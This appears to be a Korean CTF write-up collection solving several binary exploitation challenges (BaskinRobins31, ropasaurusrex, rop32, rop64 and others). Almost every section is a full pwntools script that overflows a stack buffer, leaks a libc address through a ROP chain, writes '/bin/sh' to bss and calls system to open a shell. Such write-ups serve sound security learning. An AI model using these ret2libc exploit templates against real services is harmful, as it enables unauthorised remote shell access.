rmagur1203

your_turn 함수에서 버퍼 오버플로우가 발생합니다.

your_turn 함수까지 입력받고, your_turn 함수에 puts를 이용하여 puts의 실제 주소를 출력하는 페이로드를 작성하여 전송해주고, your_turn 함수를 다시 실행하도록 하겠습니다.

r.recvuntil("(1-3)\n")

rdi_rsi_rdx = 0x000000000040087a
rdi = 0x0000000000400bc3

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)

Don't break the rules...:(\n 까지 입력받고, \n 전까지 입력받은 값을 u64로 언패킹 해줍니다.

r.recvuntil(":(")
r.recvuntil("\x0a")
puts_hex = r.recvuntil('\x0a')[:-1]
_puts = u64(puts_hex.ljust(8, '\x00'))
print("puts: ", puts_hex, _puts)

그리고 puts 주소에서 라이브러리의 puts offset 을 빼서 base를 구한 뒤, system 함수의 주소를 구하고,

bss 영역에 /bin/sh를 써서

system("/bin/sh")를 실행시켜 주겠습니다.

_base = _puts - libc.sym['puts']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10

payload = ""
payload += "A" * (0x40) + "B" * 8
payload += p64(rdi_rsi_rdx)
payload += p64(0)
payload += p64(_binsh)
payload += p64(0x10)
payload += p64(e.plt['read'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)
r.sendline('/bin/sh\x00')

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(_binsh)
payload += p64(_system)

r.sendline(payload)

전체 코드

from pwn import *

context.log_level = 'debug'

e = ELF('./BaskinRobins31')
r = remote("sunrin.site", 9008)
libc = ELF('./libc.so.6')

r.recvuntil("(1-3)\n")

rdi_rsi_rdx = 0x000000000040087a
rdi = 0x0000000000400bc3

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)

r.recvuntil(":(")
r.recvuntil("\x0a")
puts_hex = r.recvuntil('\x0a')[:-1]
_puts = u64(puts_hex.ljust(8, '\x00'))
print("puts: ", puts_hex, _puts)

_base = _puts - libc.sym['puts']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10

payload = ""
payload += "A" * (0x40) + "B" * 8
payload += p64(rdi_rsi_rdx)
payload += p64(0)
payload += p64(_binsh)
payload += p64(0x10)
payload += p64(e.plt['read'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)
r.sendline('/bin/sh\x00')

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(_binsh)
payload += p64(_system)

r.sendline(payload)

r.interactive()

64비트로 바뀌었습니다.

from pwn import *

context.log_level = 'debug'

e = ELF('./rop64_v2')
p = remote("sunrin.site", 9007)
libc = ELF('./libc.so.6')

prdi = 0x00000000004005f3
prsir15 = 0x00000000004005f1
pppret = 0x080486b9

payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(1)
payload += p64(prsir15)
payload += p64(e.got['write'])
payload += 'A' * 8
payload += p64(e.plt['write'])
payload += p64(e.sym['main'])

p.sendlineafter("World\n", payload)

_write = u64(p.recvuntil('\x7f').ljust(8, '\x00'))
base = _write - libc.symbols['write']
system = base + libc.sym['system']
binsh = e.bss() + 0x10

payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(0)
payload += p64(prsir15)
payload += p64(binsh)
payload += 'A' * 8
payload += p64(e.plt['read'])
payload += p64(e.sym['main'])

p.sendline(payload)
p.sendline('/bin/sh\x00')

payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(binsh)
payload += p64(system)

p.sendline(payload)

p.interactive()

rop32에서 함수의 주소값을 넣어줘야지 되는것과, write함수를 사용해야 하는것이 달라졌습니다.

from pwn import *

context.log_level = 'debug'

e = ELF('./ropasaurusrex')
r = remote('sunrin.site', 9005)
libc = ELF('./libc.so.6')

pppret = 0x080484b6

payload = 'A' * (0x88 + 4)
payload += p32(e.plt['write'])
payload += p32(pppret)
payload += p32(1)
payload += p32(e.got['write'])
payload += p32(0x4)
payload += p32(0x804841d)

r.sendline(payload)

_write = u32(r.recvuntil('\xf7'))
_base = _write - libc.sym['write']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10

payload = 'A' * (0x88 + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(_binsh)
payload += p32(0x20)
payload += p32(0x804841d)

r.sendline(payload)

r.sendline('/bin/sh\x00')

payload = 'A' * (0x88 + 4)
payload += p32(_system)
payload += 'A' * 4
payload += p32(_binsh)

r.sendline(payload)

r.interactive()

rop32 문제에서 버퍼 크기와 함수만 달라졌습니다.

from pwn import *

context.log_level = 'debug'

e = ELF('./rop32_v2')
p = remote("sunrin.site", 9004)
libc = ELF('./libc.so.6')

pret = 0x080486bb
pppret = 0x080486b9

payload = 'A' * (0x24 + 4)
payload += p32(e.plt['puts'])
payload += p32(pret)
payload += p32(e.got['puts'])
payload += p32(e.sym['vuln'])

p.sendlineafter(": \n", payload)

puts = u32(p.recvuntil('\xf7'))

base = puts - libc.sym['puts']
system = base + libc.sym['system']
binsh = e.bss() + 0x10

payload = 'A' * (0x24 + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])

p.sendline(payload)

p.sendline('/bin/sh\x00')

payload = 'A' * (0x24 + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)

p.sendline(payload)

p.interactive()

이전에 했던 문제들과 크게 다를게 없기 때문에 쉽게 풀 수 있습니다.

printf 함수를 이용하여 printf 함수의 실제 주소를 출력시키고, vuln 함수를 다시 실행합니다.

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['printf'])
payload += p32(popret)
payload += p32(e.got['printf'])
payload += p32(e.sym['vuln'])

p.sendlineafter(": ", payload)

printf 함수의 실제 주소를 받고, libc base 를 구합니다.

printf = u32(p.recvuntil('\xf7'))

base = printf - libc.symbols['printf']
system = base + libc.symbols['system']

/bin/sh를 bss에 넣습니다.

binsh = e.bss() + 0x10

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])

p.sendline(payload)

p.sendline('/bin/sh\x00')

system("/bin/sh")를 실행합니다.

payload = 'A' * (0x3a + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)

p.sendline(payload)

전체 코드

from pwn import *

context.log_level = 'debug'

#e = ELF('./leak_libc')
#p = process('./leak_libc')

e = ELF('./rop32')
p = remote("sunrin.site", 9003)
libc = ELF('./libc.so.6')

pdecimal = libc.search("%d\x00").next()

popret = 0x08048331
poppopret = 0x0804855a
pppret = 0x08048559

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['printf'])
payload += p32(popret)
payload += p32(e.got['printf'])
payload += p32(e.sym['vuln'])

p.sendlineafter(": ", payload)

printf = u32(p.recvuntil('\xf7'))

base = printf - libc.symbols['printf']
system = base + libc.symbols['system']
binsh = e.bss() + 0x10

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])

p.sendline(payload)

p.sendline('/bin/sh\x00')

payload = 'A' * (0x3a + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)

p.sendline(payload)

p.interactive()

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'

e = ELF("./libc.so.6")
r = remote('ctf.j0n9hyun.xyz', 3015)
#r = process("./rtlcore")

#gdb.attach(r)

hashcode = 0x0C0D9B0A7

value = hashcode // 5
remain = hashcode % 5

print(value, 0x2691f021)
payload = p32(value) * 4 + p32(value + remain)

r.sendlineafter(': ', payload)
r.recvuntil("바로 ")
_printf = int(r.recv(10), 16)
_base = _printf - e.symbols['printf']
_system = _base + e.symbols['system']
_binsh = _base + e.search("/bin/sh").next()

print(_base)
print(_base - _system)
print(_base - _binsh)

payload = 'A' * (0x3E + 4)
payload += p32(_system)
payload += 'A' * 4
payload += p32(_binsh)

r.sendline(payload)

r.interactive()

코드 보고 이부분 코드 만들어서 인증하고,

인증해서 받은 값을 확인해보니

printf 함수라서 libc의 base주소를 구하고,

거기에 system 주소를 구하고, /bin/sh의 주소를 구해

payload를 만들었습니다.